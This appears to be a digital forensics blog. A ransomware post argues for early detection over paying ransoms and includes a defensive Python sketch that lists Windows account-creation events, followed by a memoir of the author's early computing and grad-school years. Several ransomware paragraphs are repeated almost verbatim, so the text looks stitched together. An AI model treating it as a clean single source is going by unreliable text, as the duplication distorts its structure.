Yes, they will. But what does this mean? This means a couple of things; first, they decide who to target, and when. Employees within companies have targets against which they're judged; sales reps, for example, usually hit crunch time at the end of a quarter. So, what the bad guys will do is send something to a sales rep that looks legit, and it's something that they need to open. Yes, they're targeting individuals.
What does this look like, you ask? While not related to ransomware, but take a look at the Mia Ash story, and you'll see what targeting looks like. Going after sales reps, or the finance department, legal counsel...all of these are targets within an organization, and very often the "lure" looks attractive enough to obviate phishing awareness training. However, this is only the beginning. In the Mia Ash story, the adversary developed a relationship with their targets, to the point where, when it came time to send a weaponized document for the target to open, the target had no doubt in their mind regarding the fact that they were dealing with "Mia".
Something that isn't stated in the media is that, for some ransomware cases, once an adversary gains initial access to an infrastructure, there are a number of actions that must take place in order for them to have such an impact as to make paying the ransom the obvious choice going forward. They need to observe and orient to where they are, collect information about the infrastructure, make decisions (that's the easy part, they're often quite practiced at this), and then act. This is Col Boyd's OODA loop. In some cases, this can take weeks, and in others, months. Unfortunately, one of the things missing from public reporting of ransomware incidents, in addition to the observed initial access method, is the time that the adversary is on target before deploying ransomware. It's not an easy task to go into a completely new infrastructure and find those files and systems that, if unavailable, would bring the organization to a halt.
With visibility, these actions can be detected, and responded to in a timely manner. When I say, "responded to", I mean determining the initial infection vector and following a containment and eradication plan early in the adversary's process. Let's say that you detect a new account being created on a system, because you have the visibility to do so...which user account was used to create the new one? How did that user account gain access to the system on which the command was run? Follow the tracks back to the starting point, and determine how the adversary got on the system, and then search your infrastructure for other, similar artifacts.
It all starts with visibility. Don't address ransomware by trying to figure out if you should restore systems from backup or pay the ransom; instead, catch the adversary early in their process and stop them before they encrypt their first file.
Don't believe me?
Read through this ProPublica article, not just once, but a couple of times. And take notes. Then go back and read the notes. Here's what I got from the article:
- Organizations are looking to insurance policies to defray the costs of incidents. Rather than investing in prevention, detection, and response, they're accepting (to some degree) that these incidents are going to happen, and seeking to establish a means to minimize their financial risk. Hence, insurance policies.
- A ransomware incident occurs, and the policy kicks in. Depending upon how the policy was set up, and what it covers, the deductible may be much less than the ransom. Financial risk minimized.
- Insurance providers are more interested in getting ransoms paid quickly; getting the encryption keys and recovering files minimizes down time, and therefore any additional costs incurred as a result of services not being available. So, insurance providers want the ransom paid, in order to minimize their financial exposure.
- There's also an entire economy that's popped up around ransom payment brokers, organizations that act as intermediaries between victim organizations, insurance providers, and the bad guys.
Not long ago, a fellow responder shared that many of the ransomware cases he works include an element of data exfiltration. A recent 60Minutes segment on ransomware includes a similar statement; if you watch until 9:50 in the segment, you'll see mention of the bad guy further extorting an organization by threatening to leak their "internal data".
Let's look at some of the reporting on ransomware, such as this The Conversation article. At one point in the article, we see the statement:
Ransomware usually spreads via phishing emails or links...
Perhaps "usually", yes, but not always. The 60Minutes segment mentioned the Samsam ransomware; during the first half of 2016, these guys were seen using the publicly available JexBoss exploit to gain access to organizations through JBoss CMS servers. At that time, the average time between initial access to the organization and deploying the ransomware was 4 months. In 2017, in some cases, they switched to Terminal Services servers, gaining access via easily-guessed passwords. Yes, some ransomware (some Ryuk incidents, for example) incidents begin with a phishing email, and then branch off into deploying remote access tools, internal reconnaissance, possibly privilege escalation, networking mapping, and finally, deploying the ransomware.
Another quote from the article:
Offenders will do their homework before launching an attack, in order to create the most severe disruption they possibly can.
Yes, they will. But what does this mean? This means a couple of things; first, they decide who to target, and when. Employees within companies have targets against which they're judged; sales reps, for example, usually hit crunch time at the end of a quarter. So, what the bad guys will do is send something to a sales rep that looks legit, and it's something that they need to open. Yes, they're targeting individuals.
What does this look like, you ask? While not related to ransomware, take a look at the Mia Ash story, and you'll see what targeting looks like. Going after sales reps, or the finance department, legal counsel...all of these are targets within an organization, and very often the "lure" looks attractive enough to defeat phishing awareness training. However, this is only the beginning. In the Mia Ash story, the adversary developed a relationship with their targets, to the point where, when it came time to send a weaponized document for the target to open, the target had no doubt in their mind that they were dealing with "Mia".
Something that isn't stated in the media is that, for some ransomware cases, once an adversary gains initial access to an infrastructure, there are a number of actions that must take place in order for them to have such an impact as to make paying the ransom the obvious choice going forward. They need to observe and orient to where they are, collect information about the infrastructure, make decisions (that's the easy part, they're often quite practiced at this), and then act. This is Col Boyd's OODA loop. In some cases, this can take weeks, and in others, months. Unfortunately, one of the things missing from public reporting of ransomware incidents, in addition to the observed initial access method, is the time that the adversary is on target before deploying ransomware. It's not an easy task to go into a completely new infrastructure and find those files and systems that, if unavailable, would bring the organization to a halt.
With visibility, these actions can be detected, and responded to in a timely manner. When I say, "responded to", I mean determining the initial infection vector and following a containment and eradication plan early in the adversary's process. Let's say that you detect a new account being created on a system, because you have the visibility to do so...which user account was used to create the new one? How did that user account gain access to the system on which the command was run? Follow the tracks back to the starting point, and determine how the adversary got on the system, and then search your infrastructure for other, similar artifacts.
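To make that concrete, here's a minimal sketch of what "following the tracks back" from a newly created account might look like. It assumes a Windows system where account management auditing is enabled in the Security event log (EventID 4720, "a user account was created") and that wevtutil is available; the script itself is just an illustration for this post, not an existing tool, and the field names it pulls (TargetUserName, SubjectUserName) are standard fields in that event.

```python
# Minimal sketch, not a polished tool: list recent "user account created"
# events (EventID 4720) from the Windows Security log, showing which
# existing account did the creating. Assumes Windows, admin rights, and
# that account management auditing is enabled.
import subprocess
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

def recent_account_creations(count=10):
    """Yield the newest `count` EventID 4720 records from the Security log."""
    xml_out = subprocess.run(
        ["wevtutil", "qe", "Security",
         "/q:*[System[(EventID=4720)]]",   # XPath filter: account creation
         "/f:xml", f"/c:{count}", "/rd:true"],
        capture_output=True, text=True, check=True,
    ).stdout

    # wevtutil emits a series of <Event> elements, not a single document,
    # so split them apart and parse each one individually.
    for chunk in xml_out.split("</Event>"):
        if "<Event" not in chunk:
            continue
        root = ET.fromstring(chunk + "</Event>")
        data = {d.get("Name"): d.text
                for d in root.findall(".//e:EventData/e:Data", NS)}
        yield {
            "time": root.find(".//e:System/e:TimeCreated", NS).get("SystemTime"),
            "created_account": data.get("TargetUserName"),
            "created_by": data.get("SubjectUserName"),
        }

if __name__ == "__main__":
    for evt in recent_account_creations():
        print(f"{evt['time']}  {evt['created_by']} created {evt['created_account']}")
```

The SubjectUserName value is the next thread to pull: how did that account get onto the system in the first place, and where else in the infrastructure does it show up?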
It all starts with visibility. Don't address ransomware by trying to figure out if you should restore systems from backup or pay the ransom; instead, catch the adversary early in their process and stop them before they encrypt their first file.
A Brief History of DFIR Time, pt I
Whether we like it or not, we're all time travelers. We're all moving through time, caught in the flow. In the western world, we're moving left-to-right, going along with the flow of time, from point A to point B.
Sometimes it's interesting to look back at where we've been, what we've been witness to, and to reflect on and appreciate it. Here's an abridged version of my take...
As a kid, my parents purchased a Timex-Sinclair 1000 computer. I started out by following instructions for writing programs and saving them to a cassette tape...or trying to, as the case may be. This wasn't the most reliable means (although it was the only one) for saving programs, and sometimes things would get corrupted, and I'd have to start all over. As I learned a little bit of coding, I'd try different things...I'd start with the basic (no pun intended) recipe, and then make small modifications to see what happened.
In the early '80s, I was programming BASIC on the Apple IIe during a summer course. Later, my parents purchased an Epson QX-10, which my father used for word processing. During my senior year in high school, I took AP Computer Science, which involved programming PASCAL on the TRS-80 systems at the school. My folks found a copy of Turbo PASCAL, which meant I could easily compile my programs at home in minutes, rather than trying to schedule time to get access to one of the TRS-80 systems at school, and get in before lunch, because compilation took over half an hour for some programs.
When I went to college (circa '85) we had a BASIC programming course, and we were still using the TRS-80 systems. There were some mainframe systems in the physics building, and while I didn't get a real introduction to networking, some of us did have fun sending messages to each other using the "wall" command.
After I got commissioned and went on active duty, I really didn't have a great deal of contact with computers. In the Marine Corps at that time, Communications was a separate MOS from Data Processing, and as such, officers (and enlisted) for the two MOSs attended separate schools. For officers, both schoolhouses were located at Quantico at the time. After training, I found that there was a great deal of cross-training in the fleet; quite often, CommOs were sent to data processing courses by their units. The Marine Corps later combined the MOSs, along with the schoolhouses and the curricula.
In the mid-'90s, I had the opportunity to attend graduate school, and I really got much more involved with computers. I showed up with a 486DX desktop system that I used at home, and one of the first things I did was add a hard drive. At the time, that meant putting it in the right location on the ribbon cable, and setting the correct jumpers on the drive chassis. I later saved up and purchased additional RAM, going from 4MB to 16MB. Yes, with an "M". I also began going beyond Windows for Workgroups 3.11, and expanding into OS/2 2.1, and then later, OS/2 3.0 Warp. At the time, I was using a SLIP/PPP script to dial into a local ISP, and then connecting remotely to the school systems.
Interestingly enough, I found someone in my local community who was running a BBS based on Amiga systems, and got a look at his setup. That was a big deal at the time, because the town I lived in was close to a LATA border, meaning that while I could dial a number that was physically located about 10 miles south of me for no extra charge, the closest AOL POP was two miles north, and therefore, a long distance charge. Eventually an airline pilot who lived in the local community set up an ISP, and I used that to access the Internet.
At school, I was working on SPARCstations, using the Netscape browser. I was learning about UseNet, SunOS, *nix-based systems, etc., none of which had anything to do with the curriculum. I was the student rep to the sysadmin council when SATAN was released. During the course of my "studies", I learned a little bit of C and C++ coding, a lot of MatLab, and a good bit of Java, at a time before Java had reached 1.0 GA status. I played around with a bunch of different things with Java...I wrote programs to query fingerd, wrote an email spoofing program, and I wrote some code that connected the chargen port to the echo port...that was fun!
When I first started at graduate school, I didn't know it at the time, but I spent about 4 months walking by Gary Kildall's office every day on my way out of the building. His office was next to one of the main doors that led out to the quad, where I'd go sit to eat lunch. I never met Gary, nor took one of his courses, and it wasn't until much later that I found out who he was, and the role he played (or depending on your perspective, didn't play...) in the history of computing. In one of my courses, I learned about the Hamming distance, and later took a seminar from Dr. Hamming himself.
As part of my master's thesis, I set up a lab; it consisted of two Cisco 2514 routers that I cross-connected, and from which I ran two small networks. One was 10BaseT, the other 10Base2, and both had one Windows NT 3.51 server and three Windows 95 workstations. The entire setup was connected to the campus backbone via a 10Base5 "vampire tap". To collect data for my thesis, I wrote an SNMP polling application in Java, and processed the data using various statistical techniques in MatLab.
While I was in graduate school, one of my favorite courses was a new class in neural networks. Part of the reason I liked it was due to how it was structured; the first half of the course was some instruction and small projects to get our feet wet, but the projects were small enough to allow us to stretch a bit, as well. In many of the courses available at the time, the labs were such that it took most, if not all, of the week to get them done, so there was very little learning beyond just finishing the minimum requirements for the lab. In this course (and a few others), a different approach was taken, one that allowed the students to engage, experiment, and learn. The second half of the course was a project, which was really cool to work on. As it turned out, several of the students used that course as the basis for their master's thesis...one wrote a program that could discern 'dirty' images of six consecutive Cyrillic characters (i.e., something you'd see in a satellite photo of Red Square, for example). Another student created a neural network to assist with sonar identification.
So, how does all this matter? Well, 24+ years later, I can discern what's behind the terms "ML" and "AI" that we see with respect to cyber security products. ;-)
My time in grad school was also when I started brushing up against "information security" in the world of computers. During a C programming course, I finished my assigned labs and wanted to learn a bit more, so I downloaded a file called 'crack.c' to see what it did. All I ever did was open it in an editor, but the senior sysadmin for the department got upset. She even told me that I had "violated security policies". When I asked her to see the policies, knowing that I had never signed such a policy, I learned that there really was no written "policy". That was to change more than a year later when a new Admiral took over the school, but at the time, there was no written security policy that any students read or signed.
After I graduated, I spent 8 months processing out of the military, and during that time was assigned to the Marine detachment at the Defense Language Institute (DLI). While there, one of the things I did was get the detachment's computer systems connected to the DLI campus area network (CAN), which was token ring. Also during that time, the Commandant of the Marine Corps (Gen. Krulak) had stated that Marines were authorized to play "Marine DOOM"; the setup at the detachment was six Gateway systems connected via 10Base2, running IPX. I was able to use what I had learned just down the street (literally) to help get the "network" up and running.